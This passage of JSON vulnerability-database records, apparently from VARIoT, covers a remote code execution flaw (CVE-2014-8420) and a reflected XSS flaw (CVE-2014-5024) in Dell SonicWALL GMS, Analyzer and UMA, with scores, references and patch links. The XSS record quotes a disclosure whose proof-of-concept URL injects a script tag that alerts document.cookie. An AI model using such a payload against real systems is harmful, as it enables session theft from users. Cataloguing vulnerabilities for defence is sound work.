"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.2:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.2:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8420"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Brandon Perry",
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"db": "BID",
"id": "71241"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
],
"trust": 1.6
},
"cve": "CVE-2014-8420",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2014-8420",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 1.5,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-76365",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-8420",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "CVE-2014-8420",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-411",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-76365",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"db": "VULHUB",
"id": "VHN-76365"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005638"
},
{
"db": "NVD",
"id": "CVE-2014-8420"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ViewPoint web application in Dell SonicWALL Global Management System (GMS) before 7.2 SP2, SonicWALL Analyzer before 7.2 SP2, and SonicWALL UMA before 7.2 SP2 allows remote authenticated users to execute arbitrary code via unspecified vectors. Authentication is required to exploit this vulnerability.The specific flaw exists within the GMS ViewPoint (GMSVP) web application. The issue lies in the handling of configuration input due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges on the underlying operating system. Multiple Dell SonicWALL Products are prone to multiple remote code-execution vulnerabilities. Successful exploitation can completely compromise the vulnerable device. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA is a set of universal management device software",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8420"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005638"
},
{
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"db": "BID",
"id": "71241"
},
{
"db": "VULHUB",
"id": "VHN-76365"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8420",
"trust": 3.5
},
{
"db": "ZDI",
"id": "ZDI-14-385",
"trust": 3.5
},
{
"db": "BID",
"id": "71241",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005638",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-2286",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201411-411",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-76365",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"db": "VULHUB",
"id": "VHN-76365"
},
{
"db": "BID",
"id": "71241"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005638"
},
{
"db": "NVD",
"id": "CVE-2014-8420"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
]
},
"id": "VAR-201411-0383",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-76365"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:57:50.875000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SonicWALL Analyzer Product Notification",
"trust": 1.5,
"url": "https://support.software.dell.com/product-notification/136814"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005638"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76365"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005638"
},
{
"db": "NVD",
"id": "CVE-2014-8420"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.zerodayinitiative.com/advisories/zdi-14-385/"
},
{
"trust": 2.7,
"url": "https://support.software.dell.com/product-notification/136814"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/71241"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98911"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8420"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8420"
},
{
"trust": 0.3,
"url": "http://www.sonicwall.com/us/en/products/gms-series.html"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"db": "VULHUB",
"id": "VHN-76365"
},
{
"db": "BID",
"id": "71241"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005638"
},
{
"db": "NVD",
"id": "CVE-2014-8420"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"db": "VULHUB",
"id": "VHN-76365"
},
{
"db": "BID",
"id": "71241"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005638"
},
{
"db": "NVD",
"id": "CVE-2014-8420"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-21T00:00:00",
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"date": "2014-11-25T00:00:00",
"db": "VULHUB",
"id": "VHN-76365"
},
{
"date": "2014-11-21T00:00:00",
"db": "BID",
"id": "71241"
},
{
"date": "2014-11-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005638"
},
{
"date": "2014-11-25T15:59:04.637000",
"db": "NVD",
"id": "CVE-2014-8420"
},
{
"date": "2014-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-21T00:00:00",
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-76365"
},
{
"date": "2014-11-21T00:00:00",
"db": "BID",
"id": "71241"
},
{
"date": "2014-11-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005638"
},
{
"date": "2018-03-12T17:25:44.200000",
"db": "NVD",
"id": "CVE-2014-8420"
},
{
"date": "2014-12-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dell SonicWALL Product ViewPoint Web An arbitrary code execution vulnerability in an application",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005638"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
],
"trust": 0.6
}
}
var-201407-0223
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter. Multiple Dell SonicWALL Products are prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The following products are vulnerable: Dell SonicWALL Global Management System Dell SonicWALL Analyzer Dell SonicWALL Universal Managemnet Appliance. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA is a set of universal management device software. I. VULNERABILITY
Reflected XSS vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701
II. BACKGROUND
Dell® SonicWALL® provides intelligent network security and data protection solutions that enable customers and partners to dynamically secure, control, and scale their global networks.
III. DESCRIPTION
Has been detected a Reflected XSS vulnerability in DELL SonicWALL GMS. The code injection is done through the parameter "node_id" in the page “/sgms/panelManager?level=1&typeOfUnits=2&node_name=GlobalView&node_id=(HERE XSS)”
IV. PROOF OF CONCEPT
The application does not validate the parameter “node_ID” correctly. https://10.200.210.222:8443/sgms/panelManager?level=1&typeOfUnits=2&node_name=GlobalView&node_id=aaaaaaa'&panelidz=0,4#tabs-4
V.
VI. SYSTEMS AFFECTED
Tested DELL SonicWALL Analyzer v7.2 (build 7220.1700)
VII. SOLUTION
https://support.software.dell.com/product-notification/128245
By William Costa william.costa@gmail.com
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201407-0223",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "uma em5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": null
},
{
"model": "global management system",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "analyzer",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "sonicwall analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.2 sp1"
},
{
"model": "sonicwall global management system",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.2 sp1"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.2 sp1"
},
{
"model": "global management system",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "7.2"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003574"
},
{
"db": "NVD",
"id": "CVE-2014-5024"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-611"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-5024"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "William Costa",
"sources": [
{
"db": "BID",
"id": "68829"
},
{
"db": "PACKETSTORM",
"id": "127575"
}
],
"trust": 0.4
},
"cve": "CVE-2014-5024",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-5024",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-72965",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-5024",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201407-611",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-72965",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003574"
},
{
"db": "NVD",
"id": "CVE-2014-5024"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-611"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter. Multiple Dell SonicWALL Products are prone to a cross-site scripting vulnerability. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. \nThe following products are vulnerable:\nDell SonicWALL Global Management System\nDell SonicWALL Analyzer\nDell SonicWALL Universal Managemnet Appliance. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA is a set of universal management device software. I. VULNERABILITY\n-------------------------\nReflected XSS vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701\n\nII. BACKGROUND\n-------------------------\nDell\u00ae SonicWALL\u00ae provides intelligent network security and data protection\nsolutions that enable customers and partners to dynamically secure,\ncontrol, and scale their global networks. \n\nIII. DESCRIPTION\n-------------------------\nHas been detected a Reflected XSS vulnerability in DELL SonicWALL GMS. \nThe code injection is done through the parameter \"node_id\" in the page\n\u201c/sgms/panelManager?level=1\u0026typeOfUnits=2\u0026node_name=GlobalView\u0026node_id=(HERE\nXSS)\u201d\n\nIV. PROOF OF CONCEPT\n-------------------------\nThe application does not validate the parameter \u201cnode_ID\u201d correctly. \nhttps://10.200.210.222:8443/sgms/panelManager?level=1\u0026typeOfUnits=2\u0026node_name=GlobalView\u0026node_id=aaaaaaa\u0027\u003c/script\u003e\u003cbody\nonload=alert(document.cookie)\u003e\u0026panelidz=0,4#tabs-4\n\nV. \n\nVI. SYSTEMS AFFECTED\n-------------------------\nTested DELL SonicWALL Analyzer v7.2 (build 7220.1700)\n\nVII. SOLUTION\n-------------------------\nhttps://support.software.dell.com/product-notification/128245\n\nBy William Costa\nwilliam.costa@gmail.com\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-5024"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003574"
},
{
"db": "BID",
"id": "68829"
},
{
"db": "VULHUB",
"id": "VHN-72965"
},
{
"db": "PACKETSTORM",
"id": "127575"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-72965",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72965"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-5024",
"trust": 2.8
},
{
"db": "BID",
"id": "68829",
"trust": 2.0
},
{
"db": "PACKETSTORM",
"id": "127575",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "60287",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003574",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201407-611",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-72965",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72965"
},
{
"db": "BID",
"id": "68829"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003574"
},
{
"db": "PACKETSTORM",
"id": "127575"
},
{
"db": "NVD",
"id": "CVE-2014-5024"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-611"
}
]
},
"id": "VAR-201407-0223",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-72965"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:39:22.818000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GMS/Analyzer/UMA Reflected XSS Vulnerability Resolution",
"trust": 0.8,
"url": "https://support.software.dell.com/product-notification/128245"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003574"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003574"
},
{
"db": "NVD",
"id": "CVE-2014-5024"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://seclists.org/fulldisclosure/2014/jul/125"
},
{
"trust": 1.8,
"url": "https://support.software.dell.com/product-notification/128245"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/68829"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/127575/sonicwall-gms-7.2-build-7221.1701-cross-site-scripting.html"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/60287"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5024"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-5024"
},
{
"trust": 0.1,
"url": "https://10.200.210.222:8443/sgms/panelmanager?level=1\u0026typeofunits=2\u0026node_name=globalview\u0026node_id=aaaaaaa\u0027\u003c/script\u003e\u003cbody"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003574"
},
{
"db": "PACKETSTORM",
"id": "127575"
},
{
"db": "NVD",
"id": "CVE-2014-5024"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-611"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-72965"
},
{
"db": "BID",
"id": "68829"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003574"
},
{
"db": "PACKETSTORM",
"id": "127575"
},
{
"db": "NVD",
"id": "CVE-2014-5024"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-611"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-07-24T00:00:00",
"db": "VULHUB",
"id": "VHN-72965"
},
{
"date": "2014-07-22T00:00:00",
"db": "BID",
"id": "68829"
},
{
"date": "2014-07-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003574"
},
{
"date": "2014-07-22T23:53:19",
"db": "PACKETSTORM",
"id": "127575"
},
{
"date": "2014-07-24T14:55:09.910000",
"db": "NVD",
"id": "CVE-2014-5024"
},
{
"date": "2014-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-611"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-72965"
},
{
"date": "2014-07-22T00:00:00",
"db": "BID",
"id": "68829"
},
{
"date": "2014-07-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003574"
},
{
"date": "2018-03-12T17:24:32.027000",
"db": "NVD",
"id": "CVE-2014-5024"
},
{
"date": "2014-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-611"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-611"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dell SonicWALL Product sgms/panelManager Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003574"
}
],
"trust": 0.8
},
"type": {
"@context": {
